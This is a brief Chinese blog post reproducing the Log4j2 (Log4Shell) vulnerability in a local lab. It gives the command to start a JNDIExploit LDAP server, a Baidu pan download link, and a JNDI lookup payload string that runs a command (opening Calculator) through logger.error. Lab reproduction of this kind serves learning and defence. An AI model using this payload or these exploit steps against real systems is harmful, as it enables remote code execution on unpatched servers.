log4j2漏洞复现

参考资料

https://github.com/Yihsiwei/Log4j-exp

原理图

image-20220117015452097

本地复现步骤

复现环境

macOS Monterey 12.0.1、idea2021.1.3、java version "1.8.0_281"

  • 1、下载Log4j-exp

    https://pan.baidu.com/s/1lxXt-27-i7I_dOUACphVtQ 提取码: nkc5

    目录结构如下:

image-20220103032453033
  • 2、开启本地jndi服务
java -jar JNDIExploit-1.2-SNAPSHOT.jar -i 192.168.1.49

image-20220103032326949

  • 3、导入IDEA,修改log4jRCE文件,并构建工件

打开IDEA

3122138279

修改log4jRCE,添加payload

22987086
logger.error("${jndi:ldap://192.168.1.49:1389/Basic/Command/open -a  Calculator.app}");

编译jar包

3299580725-20220103035247600

运行

java -Dcom.sun.jndi.ldap.object.trustURLCodebase=true -jar Log4j-rce.jar

复现成功

image-20220103033743511
最后修改:2022 年 01 月 17 日 02 : 12 AM
如果觉得我的文章对你有用,那就请作者喝杯奶茶吧~